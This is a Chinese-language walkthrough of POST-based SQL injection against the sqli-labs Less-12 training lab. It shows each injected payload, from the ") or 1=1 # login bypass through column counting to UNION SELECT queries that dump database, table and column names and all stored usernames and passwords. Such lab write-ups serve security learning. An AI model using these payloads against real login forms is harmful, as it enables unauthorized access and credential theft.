sqli-labs less-12 post注入
sqli-labs less-12
首先尝试在url进行测试,发现页面无任何变化。在提交窗口随意输入,打开hackbar插件,查看数据 (注意,hackbar插件使用时,&Submit=Submit中S必须大写)
猜测为post注入。在post提交参数中uname后加入单引号,页面显示登录失败,无报错,添加双引号,报错
post注入参数
uname=aaa"&passwd=aaa&Submit=Submit
从报错分析闭合方式为")
,构造
uname=aaa") or 1=1 #&passwd=aaa&Submit=Submit
显示
存在注入
查看列数
uname=aaa") order by 4 #&passwd=aaa&Submit=Submit 报错
uname=aaa") order by 3 #&passwd=aaa&Submit=Submit 报错
uname=aaa") order by 2 #&passwd=aaa&Submit=Submit 无回显,确定列数2
union联合注入查询确定回显位,数据库名,版本等
uname=aaa") union select 1,2 #&passwd=aaa&Submit=Submit
uname=aaa") union select database(),version() #&passwd=aaa&Submit=Submit
爆出所有数据库名,表名,列名,数据
- uname=aaa") union select group_concat(schema_name),version() from information_schema.schemata #&passwd=aaa&Submit=Submit
所有数据库
- uname=aaa") union select group_concat(table_name),version() from information_schema.tables where table_schema=database() #&passwd=aaa&Submit=Submit
security的所有表明
- uname=aaa") union select group_concat(column_name),version() from information_schema.columns where table_schema=database() and table_name=‘users’ #&passwd=aaa&Submit=Submit
所有列明
*uname=aaa") union select group_concat(username,‘:’,password),version() from security.users #&passwd=aaa&Submit=Submit
数据
至此,结束,
题外话:想问一下大家,为什么这次不能使用–+注入,只能–或者#。且–与&之间需要空格,不能直连,是因为url编码嘛,求大佬指点。谢谢